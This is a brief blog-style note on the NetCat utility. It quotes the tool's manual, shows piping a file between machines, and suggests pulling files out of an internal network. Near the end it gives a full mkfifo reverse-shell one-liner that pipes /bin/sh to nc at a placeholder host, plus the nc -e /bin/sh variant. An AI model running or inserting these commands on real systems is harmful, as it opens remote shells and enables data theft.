What is NetCat

  • According to its manual:
    Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. 
    It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts.  
    At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.  
    Netcat, or "nc" as the original program was named, should have been supplied long ago as another one of those cryptic but standard Unix tools.
  • From a hacker's perspective, NetCat is known as a very handy tool when it comes to implementing a system shell or testing connectivity.

  • Plus, NetCat can be used as a file transfer tool or a cross-machine clipboard


File transfer

  • If you open a port 4444 on one machine, say, and want to put file test.txt from on it

    • on, open 4444 with nc -nlvp 4444
    • on, cat test.txt | nc -nv 4444

    nc file transfer

  • You can easily pull a file out of an internal network using this method, through a reverse shell

Reverse shell

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <host> <port> >/tmp/f can be used when the NetCat on target system doesn't support nc -nv <host> <port> -e /bin/sh


comments powered by Disqus